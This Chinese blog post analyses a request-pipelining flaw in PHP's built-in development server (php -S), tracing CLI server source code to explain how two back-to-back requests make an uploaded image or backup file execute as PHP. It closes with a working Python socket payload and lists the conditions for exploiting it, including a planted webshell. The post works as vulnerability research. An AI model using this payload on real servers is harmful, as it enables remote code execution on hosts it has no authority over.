从php Zend 内核层分析PHP built-in server http请求走私漏洞

PHP built-in server http请求走私漏洞

漏洞演示

先给大家演示一下该漏洞的效果

当前目录下,只有一个图片文件,但是图片文件中的是php代码

我在此目录下启动php服务

在我发送payload之后,你会发现,

这里面的php代码被执行了

Zend内核层原理深入剖析

php源码下载

https://www.php.net/distributions/php-7.3.4.tar.gz
https://www.php.net/distributions/php-7.3.4.tar.bz2
# 64位 NTS编译好的二进制文件
https://windows.php.net/downloads/releases/archives/php-7.3.4-nts-Win32-VC15-x64.zip

漏洞描述

PHP Built-in Server 在处理 HTTP 请求时,使用了基于回调的事件驱动解析器php_http_parser。当解析器在单次调用中接收到多个连续的 HTTP 请求时,会依次触发各个请求的回调函数。 由于回调函数对php_cli_server_request结构体的字段进行直接覆盖,而没有正确的边界检查,导致:

第一个请求的 path_translated + 第二个请求的 ext = 类型混淆

最终,一个扩展名为 .xxx(任意三字后缀,例如.png .jpg .bak .gif .zip .rar .wav等等) 的文件会因为扩展名被错误地更新为 .php,而被 PHP 解释器当作脚本执行。

示意图

漏洞分析

核心结构
请求结构体定义

文件位置: sapi/cli/php_cli_server:php_cli_server_request

typedef struct php_cli_server_request {
    enum php_http_method request_method;  // GET, POST, etc.
    int protocol_version;                 // HTTP版本号

    char *request_uri;                    // 原始URI
    size_t request_uri_len;

    char *vpath;                          // 虚拟路径(从URL解析)
    size_t vpath_len;

    char *path_translated;                // 文件系统路径
    size_t path_translated_len;           // 实际执行的文件

    char *path_info;                      // PATH_INFO
    size_t path_info_len;

    char *query_string;                   // 查询字符串
    size_t query_string_len;

    HashTable headers;                    // HTTP头部
    HashTable headers_original_case;

    char *content;                        // POST数据
    size_t content_len;

    const char *ext;                      // 扩展名指针
    size_t ext_len;                       // 指向vpath内部!

    zend_stat_t sb;                       // 文件状态
} php_cli_server_request;

字段说明

1. ext 是一个指针,指向 vpath 字符串的某个位置

2. 当 vpath 被释放并重新分配时,ext 会变成悬空指针

3. path_translated 是独立分配的,只有文件存在时才会更新

客户端

文件: sapi/cli/php_cli_server.c:php_cli_server_request

typedef struct php_cli_server_client {
	struct php_cli_server *server;
	php_socket_t sock;
	struct sockaddr *addr;
	socklen_t addr_len;
	char *addr_str;
	size_t addr_str_len;
	php_http_parser parser;
	unsigned int request_read:1;
	char *current_header_name;
	size_t current_header_name_len;
	unsigned int current_header_name_allocated:1;
	char *current_header_value;
	size_t current_header_value_len;
	enum { HEADER_NONE=0, HEADER_FIELD, HEADER_VALUE } last_header_element;
	size_t post_read_offset;
	php_cli_server_request request;
	unsigned int content_sender_initialized:1;
	php_cli_server_content_sender content_sender;
	int file_fd;
} php_cli_server_client;

问题所在:request 是一个共享的单例对象,多个 HTTP 请求会反复修改同一个 request 结构以及没有针对管道化请求的隔离机制

内存状态变化总结

┌─────────────────────────────────────────────────────────┐
│  php_cli_server_client (客户端结构)                     │
├─────────────────────────────────────────────────────────┤
│  parser:     [状态机]                                   │
│  request_read: 0 → 1 (第一个请求完成后)                 │
│  request: ───────┐                                       │
└──────────────────┼───────────────────────────────────────┘
                   │
                   ▼
┌─────────────────────────────────────────────────────────┐
│  php_cli_server_request (请求对象)                      │
├─────────────────────────────────────────────────────────┤
│                                                          │
│  第一个请求完成时:                                      │
│  ┌────────────────────────────────────────────┐         │
│  │ vpath: 0x001000 → "s3Cr37_f1L3.php.bak"   │         │
│  │                            └──┐            │         │
│  │ ext:   0x001012 ──────────────┘ ("bak")   │         │
│  │ ext_len: 3                                 │         │
│  │                                            │         │
│  │ path_translated: 0x002000 →                │         │
│  │   "/var/www/s3Cr37_f1L3.php.bak"          │         │
│  └────────────────────────────────────────────┘         │
│                                                          │
│  第二个请求的 on_path() 调用后:                        │
│  ┌────────────────────────────────────────────┐         │
│  │ vpath: 0x001000 → "phantom.php" (覆盖)    │         │
│  │                      └──┐                  │         │
│  │ ext:   0x001012 ─────┐  │ (悬空指针!)    │         │
│  │                      ▼  ▼                  │         │
│  │        (指向已释放的内存或垃圾数据)        │         │
│  │                                            │         │
│  │ path_translated: 0x002000 →  (未改变!)    │         │
│  │   "/var/www/s3Cr37_f1L3.php.bak"          │         │
│  └────────────────────────────────────────────┘         │
│                                                          │
│  第二个请求的 on_message_complete() 调用后:            │
│  ┌────────────────────────────────────────────┐         │
│  │ vpath: 0x001000 → "phantom.php"           │         │
│  │                      └──┐                  │         │
│  │ ext:   0x001008 ────────┘ ("php")         │         │
│  │ ext_len: 3                                 │         │
│  │                                            │         │
│  │ path_translated: 0x002000 →  (仍未改变!)  │         │
│  │   "/var/www/s3Cr37_f1L3.php.bak"          │         │
│  │                                            │         │
│  │   类型混淆状态                              │         │
│  └────────────────────────────────────────────┘         │
└─────────────────────────────────────────────────────────┘
请求读取入口

文件: sapi/cli/php_cli_server.c:php_cli_server_client_read_request

static int php_cli_server_client_read_request(
    php_cli_server_client *client,
    char **errstr)
{
    char buf[16384];  //  16KB缓冲区,可容纳多个请求

    static const php_http_parser_settings settings = {
        php_cli_server_client_read_request_on_message_begin,
        php_cli_server_client_read_request_on_path,         // !
        php_cli_server_client_read_request_on_query_string,
        php_cli_server_client_read_request_on_url,
        php_cli_server_client_read_request_on_fragment,
        php_cli_server_client_read_request_on_header_field,
        php_cli_server_client_read_request_on_header_value,
        php_cli_server_client_read_request_on_headers_complete,
        php_cli_server_client_read_request_on_body,
        php_cli_server_client_read_request_on_message_complete  // !
    };

    size_t nbytes_consumed;
    int nbytes_read;

    // 【检查点1】: 如果已读取完成,直接返回
    if (client->request_read) {
        return 1;  // ! 只在函数入口检查一次
    }

    // 【关键操作】: 从socket读取数据
    // 如果客户端发送了多个请求,可能一次性读入buf
    nbytes_read = recv(client->sock, buf, sizeof(buf) - 1, 0);
    if (nbytes_read < 0) {
        // 错误处理...
        int err = php_socket_errno();
        if (err == SOCK_EAGAIN) {
            return 0;
        }
        *errstr = php_socket_strerror(err, NULL, 0);
        return -1;
    } else if (nbytes_read == 0) {
        *errstr = estrdup(php_cli_server_request_error_unexpected_eof);
        return -1;
    }

    client->parser.data = client;

    // 【漏洞触发点】: 调用HTTP解析器
    // 这个函数会解析buf中的所有完整请求
    // 每解析完一个请求,都会调用on_message_complete
    nbytes_consumed = php_http_parser_execute(&client->parser,
                                                &settings,
                                                buf,
                                                nbytes_read);

    if (nbytes_consumed != (size_t)nbytes_read) {
        // 解析错误...
        if (buf[0] & 0x80 || buf[0] == 0x16) {
            *errstr = estrdup("Unsupported SSL request");
        } else {
            *errstr = estrdup("Malformed HTTP request");
        }
        return -1;
    }

    // 处理当前header...
    if (client->current_header_name) {
        char *header_name = safe_pemalloc(
            client->current_header_name_len, 1, 1, 1);
        memmove(header_name, client->current_header_name,
                client->current_header_name_len);
        client->current_header_name = header_name;
        client->current_header_name_allocated = 1;
    }

    return client->request_read ? 1 : 0;
}

问题分析

这个检查只在函数入口执行一次,并且无法阻止 php_http_parser_execute() 内部解析多个请求

解析器会处理 buf 中的所有完整请求

每遇到 \r\n\r\n(请求结束标记),就触发 on_message_complete

路径回调

文件: sapi/cli/php_cli_server.c:php_cli_server_client_read_request_on_path

static int php_cli_server_client_read_request_on_path(
    php_http_parser *parser,
    const char *at,        // 指向解析缓冲区中的路径字符串
    size_t length)         // 路径长度
{
    php_cli_server_client *client = parser->data;
    {
        char *vpath;
        size_t vpath_len;

        // 规范化虚拟路径(处理URL编码、相对路径等)
        normalize_vpath(&vpath, &vpath_len, at, length, 1);

        // 漏洞点: 无条件覆盖
        // 问题1: 没有检查client->request_read标志
        // 问题2: 直接覆盖指针,导致ext成为悬空指针
        // 问题3: 没有释放旧的vpath内存(normalize_vpath内部会处理)
        client->request.vpath = vpath;
        client->request.vpath_len = vpath_len;
    }
    return 0;
}
路径翻译函数

文件: sapi/cli/php_cli_server.c:php_cli_server_request_translate_vpath

这个函数有一百多行,就简化逻辑展示了,感兴趣的师傅可以自己去阅读源码

static void php_cli_server_request_translate_vpath(
    php_cli_server_request *request,
    const char *document_root,
    size_t document_root_len)
{
    zend_stat_t sb;
    static const char *index_files[] = { "index.php", "index.html", NULL };

    // 分配缓冲区并构建完整路径
    char *buf = safe_pemalloc(1, request->vpath_len,
                              1 + document_root_len + 1 + sizeof("index.html"), 1);
    char *p = buf, *prev_path = NULL, *q, *vpath;
    size_t prev_path_len = 0;
    int is_static_file = 0;

    // 拼接路径: document_root + vpath
    memmove(p, document_root, document_root_len);
    p += document_root_len;
    vpath = p;

    if (request->vpath_len > 0 && request->vpath[0] != '/') {
        *p++ = DEFAULT_SLASH;
    }

    // 检查vpath中是否包含'.'(判断是否为静态文件)
    q = request->vpath + request->vpath_len;
    while (q > request->vpath) {
        if (*q-- == '.') {
            is_static_file = 1;
            break;
        }
    }

    memmove(p, request->vpath, request->vpath_len);

#ifdef PHP_WIN32
    // Windows: 转换路径分隔符
    q = p + request->vpath_len;
    do {
        if (*q == '/') {
            *q = '\\';
        }
    } while (q-- > p);
#endif

    p += request->vpath_len;
    *p = '\0';
    q = p;

    // 【关键循环】: 尝试stat文件
    while (q > buf) {
        //  尝试stat文件
        if (!php_sys_stat(buf, &sb)) {
            // 文件存在
            if (sb.st_mode & S_IFDIR) {
                // 如果是目录,尝试查找index文件
                const char **file = index_files;
                if (q[-1] != DEFAULT_SLASH) {
                    *q++ = DEFAULT_SLASH;
                }
                while (*file) {
                    size_t l = strlen(*file);
                    memmove(q, *file, l + 1);
                    if (!php_sys_stat(buf, &sb) && (sb.st_mode & S_IFREG)) {
                        q += l;
                        break;
                    }
                    file++;
                }
                if (!*file || is_static_file) {
                    // 没找到索引文件或是静态文件
                    if (prev_path) {
                        pefree(prev_path, 1);
                    }
                    pefree(buf, 1);
                    //  【关键点】: 直接返回,不设置path_translated
                    return;
                }
            }
            // 找到普通文件,跳出循环
            break;
        }

        //  【关键点】: 文件不存在的处理
        // 如果文件不存在,这里会尝试去掉最后一个路径组件
        // 但对于简单的文件名(如phantom.php),会直接跳出while循环
        // 然后在函数末尾,如果sb未被设置(文件不存在),
        // path_translated可能不会被更新

        if (prev_path) {
            pefree(prev_path, 1);
            *q = DEFAULT_SLASH;
        }
        while (q > buf && *(--q) != DEFAULT_SLASH);
        prev_path_len = p - q;
        prev_path = pestrndup(q, prev_path_len, 1);
        *q = '\0';
    }

    // 设置path_info和path_translated
    if (prev_path) {
        request->path_info_len = prev_path_len;
#ifdef PHP_WIN32
        while (prev_path_len--) {
            if (prev_path[prev_path_len] == '\\') {
                prev_path[prev_path_len] = '/';
            }
        }
#endif
        request->path_info = prev_path;
        pefree(request->vpath, 1);
        request->vpath = pestrndup(vpath, q - vpath, 1);
        request->vpath_len = q - vpath;
        request->path_translated = buf;
        request->path_translated_len = q - buf;
    } else {
        pefree(request->vpath, 1);
        request->vpath = pestrndup(vpath, q - vpath, 1);
        request->vpath_len = q - vpath;

        //  这里设置path_translated
        // 但如果上面的stat失败了,可能buf指向的是document_root
        // 或者根本没有执行到这里(提前return了)
        request->path_translated = buf;
        request->path_translated_len = q - buf;
    }

#ifdef PHP_WIN32
    // 规范化vpath
    {
        uint32_t i = 0;
        for (; i < request->vpath_len; i++) {
            if (request->vpath[i] == '\\') {
                request->vpath[i] = '/';
            }
        }
    }
#endif

    request->sb = sb;
}

如果第二个请求的文件(phantom.php)不存在,函数会直接 return,不修改 path_translated,因此导致 path_translated 保持为第一个请求的值

拓展名获取

文件: sapi/cli/php_cli_server.c:php_cli_server_client_read_request_on_message_complete

static int php_cli_server_client_read_request_on_message_complete(php_http_parser *parser)
{
	php_cli_server_client *client = parser->data;
     // 设置协议版本
	client->request.protocol_version = parser->http_major * 100 + parser->http_minor;
    // 翻译虚拟路径为文件系统路径
	php_cli_server_request_translate_vpath(&client->request, client->server->document_root, client->server->document_root_len);
	 //  提取文件扩展名
    {
		const char *vpath = client->request.vpath, *end = vpath + client->request.vpath_len, *p = end;
		client->request.ext = end;
        // 默认设置:无扩展名
		client->request.ext_len = 0;
          // 从后向前查找最后一个'.'
		while (p > vpath) {
			--p;
			if (*p == '.') {
				++p;
                // 设置ext指针指向vpath内部
                // 问题: ext是一个普通指针,直接指向vpath的某个位置
                // 当vpath被释放或重新分配时,ext会成为悬空指针
				client->request.ext = p;
				client->request.ext_len = end - p;
				break;
			}
		}
	}
    // 标记请求已读取
    // 问题: 这个标志的设置"太晚"了
    // 解析器在同一次php_http_parser_execute调用中,
    // 还会继续处理buffer中的剩余数据(第二个请求)
	client->request_read = 1;
	return 0;
}

执行流程

第一个请求完成时:
┌──────────────────────────────────┐
│ vpath = "s3Cr37_f1L3.php.bak"    │ (地址: 0x1000)
│                         │        │
│                         ▼        │
│ ext 指向 vpath[18] = "bak"       │ (地址: 0x1012)
│ ext_len = 3                      │
└──────────────────────────────────┘

第二个请求的on_path调用后:
┌──────────────────────────────────┐
│ 旧vpath被释放: 0x1000             │
│ 新vpath分配: "phantom.php"        │ (地址: 可能是0x1000或其他)
│                                  │
│ ext = 0x1012   悬空指针!          │
└──────────────────────────────────┘

第二个请求的on_message_complete调用后:
┌──────────────────────────────────┐
│ vpath = "phantom.php"            │ (地址: 0x1000)
│                    │             │
│                    ▼             │
│ ext 指向 vpath[8] = "php"        │ (地址: 0x1008)
│ ext_len = 3                      │
└──────────────────────────────────┘

分发判断

文件: sapi/cli/php_cli_server.c:php_cli_server_dispatch

static int php_cli_server_dispatch(php_cli_server *server, php_cli_server_client *client) /* {{{ */
{
	int is_static_file  = 0;

	SG(server_context) = client;
    // 通过ext和path_translated来判断文件类型
	if (client->request.ext_len != 3 || memcmp(client->request.ext, "php", 3) || !client->request.path_translated) {
		// 条件1: 扩展名长度| 条件2: 扩展名内容 | 条件3: 路径有效性
        is_static_file = 1;
	}
// 如果有路由器或不是静态文件,初始化PHP请求
	if (server->router || !is_static_file) {
		if (FAILURE == php_cli_server_request_startup(server, client)) {
			SG(server_context) = NULL;
			php_cli_server_close_connection(server, client);
			destroy_request_info(&SG(request_info));
			return SUCCESS;
		}
	}
  // 如果配置了路由器脚本,先执行
	if (server->router) {
		if (!php_cli_server_dispatch_router(server, client)) {
			php_cli_server_request_shutdown(server, client);
			return SUCCESS;
		}
	}
//  根据is_static_file标志决定处理方式
	if (!is_static_file) {
         //  当作PHP脚本执行
        // 使用path_translated作为脚本路径
		if (SUCCESS == php_cli_server_dispatch_script(server, client)
				|| SUCCESS != php_cli_server_send_error_page(server, client, 500)) {
			if (SG(sapi_headers).http_response_code == 304) {
				SG(sapi_headers).send_default_content_type = 0;
			}
			php_cli_server_request_shutdown(server, client);
			return SUCCESS;
		}
	} else {
         // 当作静态文件处理
		if (server->router) {
			static int (*send_header_func)(sapi_headers_struct *);
			send_header_func = sapi_module.send_headers;
			/* do not generate default content type header */
		    SG(sapi_headers).send_default_content_type = 0;
			/* we don't want headers to be sent */
			sapi_module.send_headers = sapi_cli_server_discard_headers;
			php_request_shutdown(0);
			sapi_module.send_headers = send_header_func;
		    SG(sapi_headers).send_default_content_type = 1;
			SG(rfc1867_uploaded_files) = NULL;
		}
		if (SUCCESS != php_cli_server_begin_send_static(server, client)) {
			php_cli_server_close_connection(server, client);
		}
		SG(server_context) = NULL;
		return SUCCESS;
	}

	SG(server_context) = NULL;
	destroy_request_info(&SG(request_info));
	return SUCCESS;
}

攻击者发送两个连续请求(如 GET /shell.jpg 紧接 GET /phantom.php)

利用 PHP Built-in Server 在 php_http_parser_execute() 单次调用中处理多请求时的状态分裂缺陷:第一个请求让 translate_vpath() 检测到 shell.jpg 存在后设置 path_translated = “/path/to/shell.jpg”;第二个请求因 phantom.php 不存在导致 translate_vpath() 提前返回而不更新 path_translated,但 extract_extension() 仍从新的 vpath 提取并更新 ext = “php”;

最终 dispatch() 在检查 if (ext_len != 3 || memcmp(ext, “php”, 3) || !path_translated)时发现三个条件全部不满足(ext_len=3 且 ext=”php” 且 path_translated 非空),导致 is_static_file = 0,服务器误判将 path_translated 指向的 .jpg 静态文件当作PHP脚本执行——关键在于第一个文件(任意三字符后缀的后门文件,必须存在)的处理方式由第二个文件(.php 结尾,不需要存在)的扩展名决定,当第二个请求的 ext被识别为 “php” 时,is_static_file 被设为 0,触发 php_cli_server_dispatch_script() 将第一个请求的静态文件作为 PHP 代码执行。

影响范围

版本

PHP<= 7 . 4 . 21

利用条件

  1. 目标使用 php -S 启动的内置服务器
  2. web目录可上传,或者存在任意三字符后缀的webshell文件

利用payload

在python的终端中输入

import socket
p=b"GET /test.jpg HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\nPOST /x.php HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 0\r\n\r\n"
s=socket.socket()
s.connect(("127.0.0.1",8888))
s.send(p)
print(s.recv(4096).decode())
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇